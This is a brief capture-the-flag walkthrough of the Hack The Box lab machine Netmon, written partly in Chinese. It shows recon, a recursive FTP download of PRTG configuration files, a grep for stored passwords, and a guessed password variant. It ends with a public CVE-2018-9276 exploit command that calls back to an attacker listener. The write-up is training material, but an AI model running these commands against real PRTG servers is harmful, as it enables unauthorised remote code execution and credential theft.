- URL : https://app.hackthebox.eu/machines/Netmon
- IP : 10.129.210.193
Recon
Open 10.129.210.193:80
Open 10.129.210.193:135
Open 10.129.210.193:139
Open 10.129.210.193:445
Open 10.129.210.193:5985
- nmap
- FTP
- Web
- appVersion’:’18.1.37.13946′
data:image/s3,"s3://crabby-images/aa6f3/aa6f31c2faeb546938635c0714425d6e7932f970" alt=""
- https://github.com/wildkindcc/CVE-2018-9276
- https://github.com/chcx/PRTG-Network-Monitor-RCE
FTP
data:image/s3,"s3://crabby-images/feeb1/feeb15ee0ceaabb924e449912cddfcbb4b89beb3" alt=""
data:image/s3,"s3://crabby-images/81808/8180899f1764a0c20c8a2ff390225b3f57cd9ff8" alt=""
- Try Exploit
- https://github.com/chcx/PRTG-Network-Monitor-RCE
data:image/s3,"s3://crabby-images/41108/411087c7a11e8eff4f63f2fca7af7db5e51e4eae" alt=""
- 需要登入才能用,所以我們需要找帳密QQ
- 從官網發現 Log 跟 Config 存在
/ProgramData/Paessler
wget -r ftp://10.129.210.193/ProgramData/Paessler
- 整包載下來
grep password */* | less
- 發現
PRTG Configuration.dat
很可疑 data:image/s3,"s3://crabby-images/85a2a/85a2adbf92861b896fea420691a257d82dd563a1" alt=""
- 看到相關的檔案有以下幾個
PRTG Configuration.old.bak
PRTG Configuration.dat
PRTG Configuration.old
Configuration Auto-Backups/*
PRTG Configuration.old.bak
應該最可疑data:image/s3,"s3://crabby-images/84ccd/84ccdfcb52c3b39104bf361ee951139946815eb2" alt=""
- 看到帳密
prtgadmin
PrTg@dmin2018
- 但登入失敗
- 通靈把密碼改
2019
prtgadmin
PrTg@dmin2019
- 登入成功
data:image/s3,"s3://crabby-images/8558e/8558ee2a06766fe0f06c303802acba99b57a4902" alt=""
Exploit
- https://github.com/wildkindcc/CVE-2018-9276
python CVE-2018-9276.py -i 10.129.210.202 -p 80 --lhost 10.10.16.35 --lport 7877 --user prtgadmin --password PrTg@dmin2019
data:image/s3,"s3://crabby-images/75476/75476984ad746aa574ecb3e721cb6e07533ce298" alt=""
- 確定權限
- 取得 Flag
學到了
- FTP 記得 ls -al 避免隱藏檔案
- 密碼可以試試看猜規則 QQ